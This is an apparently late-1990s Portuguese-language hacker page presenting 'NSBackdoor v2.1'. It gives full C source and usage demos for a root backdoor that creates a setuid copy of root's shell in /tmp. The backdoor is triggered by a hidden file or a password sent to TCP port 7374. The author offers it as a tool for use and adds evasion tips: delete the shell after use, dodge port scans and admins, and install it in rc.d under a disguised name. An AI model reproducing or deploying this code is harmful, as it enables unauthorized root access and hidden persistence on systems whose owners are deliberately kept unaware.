NSBackdoor

Ae gurizada medonha!!!
Como ja eh de costume estou aki novamente para trazer a vcs mais um
programa elitao da FABRICA DE AMOR CHEAT STRUCK.
O que este faiz agora?? C voce ja deu uma passada na minha page
(atualizada em dezembro/99), ja deve ter visto o nsbackdoor versao 1.0, que
foi publicada apenas para demonstrar uma ideia minha ao mundo. Mas agora o
negocio pegou fogo e ta bem quente.
Vamos a alguns exemplos de como usa-lo:


root# ./nsback -f &
[1] 3035
struck$ cd /tmp
struck$ ls -a
. ..
struck$ touch .teta7374
(espere 1 minuto)
struck$ ls -la
. .. .s
struck$ ./.s
root# rm -f .s


Este metodo eh o antigo. Voce ativa a backdoor atravez de um arquivo
vazio e em 60 segundos a back eh criada. Lembre-se de apagar a backdoor
assim q executa-la para nao deixar suspeitas.


root# ./nsback -fp &
[2] 3042
struck$ cd /tmp
struck$ echo fucklit0 > .teta7374
(espere 1 minuto)
struck$ ./.s
root#


Aki eh praticamente a mesma coisa, mas dentro do arquivo deve conter a
senha do jogo ou nada feito. Se o programa detectar o arquivo mas nao a
senha, ele sera apagado para que sirva de sinal a vc q a senha ta errada.


root# ./nsback -c &
[3] 3046
struck$ telnet 127.0.0.1 7374
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
fucklit0 <---- Digite a senha aki!!!
Connection closed by foreign host.
struck$ ./.s
root#


Essa eh nova, voce pode ativar a backdoor remotamente atravez de uma
porta q o programa abre. Caso a senha entrada for incorreta, o programa
fecha a porta e soh a reabre dentro de 1 minuto. Isso eh otimo para evitar
que SPKs (Scan Port Kiddies) ou admins achem sua backdoor.
E eh issu ae gurizao. Agora vc tem uma ferramenta preciosa em suas maos,
e use-a da melhor maneira q encontrar. Uma dica... coloque-a no rc.d e
salve-o com um nome disfarcado como /usr/sbin/tty-init.

<++> nsback/nsb.c
/* NSBACKDOOR v2.1 by Cheat Struck
*
* Esta eh a versao updateada da SUPER ELEET HACKER BACKDOOR feita por
* Cheat Struck para voce. A versao 1.0 era bem simples e eu nem
* pensava em mecher mais neste prog. Mas como acharam hax0r decidi
* fazer algo realmente lito para vcs temerem.
* Sem mais enrolacao, vamos aos modos de execucao do prog:
*
*
* [root@phear]# ./nsback [tipo] &
*
* tipo:
* -f = Ativa a backdoor BACK_FILE atravez do arquivo TMP_FILE
* -fp = O mesmo porem dentro do TMP_FILE deve ter a PASSWORD
* -c = Ativa a backdoor remotamente pela PORT e necessita PASSWORD
*
*
* O modo padrao usado eh -f.
* Este programa deve ser executado como root e pode ficar em background
* para nao atrapalhar outros jobs. Sendo assim o & eh necessario.
*
*/

#define BACK_FILE "/tmp/.s" /* This is the shell backdoor */
#define TMP_FILE "/tmp/.teta7374"
#define PASSWORD "cstruck0"
#define PORT 7374

#include <stdio.h>
#include <stdlib.h>
#include <pwd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>


char shell[15];
char pass[sizeof(PASSWORD)];
char com[2048];


void get_sh(char user[20]) {
struct passwd *p;
p = getpwnam(user);
sprintf(shell, "%s", p->pw_shell);
}


void closefile(FILE *fp) {
fclose(fp);
sprintf(com, "rm -f %s", TMP_FILE);
system(com);
}


int fverify(char *file) {
FILE *fp;
if((fp=fopen(file,"r")) != NULL) {
if(fgets(pass, sizeof(PASSWORD), fp) == NULL) {
closefile(fp);
return(1);
}
else {
if(strcmp(PASSWORD,pass) == 0) { closefile(fp); return(2); }
else { closefile(fp); return(1); }
}
}
else return(0);
}


int cverify(int port) {
int s0ck, c0nnect, size;
struct sockaddr_in ina, client;

if((s0ck=socket(AF_INET,SOCK_STREAM,0)) == -1) return(0);
ina.sin_addr.s_addr = INADDR_ANY;
ina.sin_family = AF_INET;
ina.sin_port = htons(port);
bzero(&(ina.sin_zero),8);

if(bind(s0ck, (struct sockaddr *) &ina, sizeof(ina)) == -1) return(0);
if(listen(s0ck,1) == -1) return(0);

size = sizeof(client);
if((c0nnect = accept(s0ck, (struct sockaddr *) &client, &size)) == -1) return(0);
size = sizeof(PASSWORD) - 1;
if(recv(c0nnect, pass, size,0) == -1) return(0);
if(strncmp((char *)PASSWORD, pass, size) == 0) {
close(c0nnect); close(s0ck);
return(1);
}
else { close(c0nnect); close(s0ck); return(0); }
}


int makeback(void) {
sprintf(com, "cp %s %s", shell, BACK_FILE);
system(com);
sprintf(com, "chmod +s %s", BACK_FILE);
system(com);
}

main(int argc, char *argv[]) {
int type=1;

if(argc > 1) {
if(strcmp(argv[1],"-f") == 0) type=1;
if(strcmp(argv[1],"-c") == 0) type=2;
if(strcmp(argv[1],"-fp") == 0) type=3;
}

get_sh("root");
while(0 == 0) {
if((type == 1) && (fverify(TMP_FILE) >= 1)) makeback();
if((type == 2) && (cverify(PORT) == 1)) makeback();
if((type == 3) && (fverify(TMP_FILE) == 2)) makeback();
sleep(60);
}

}

<-->


Prontu! Tah tudo ae.
O source aberto aki eh da versao 2.1 do nsb, que ja esta desatualizada
no meu HD. A atual ja eh 3.7 que c comparada a esta faria ela virar um
lixo. Mas este ja eh total private e vai levar um tempo ainda para ser
aberto ao publico.
Hosted by www.Geocities.ws

Copyright © Cyber Nine/Crack's S.A todos direitos reservados
Hosted by www.Geocities.ws

Hosted by www.Geocities.ws

Hosted by www.Geocities.ws

Hosted by www.Geocities.ws

1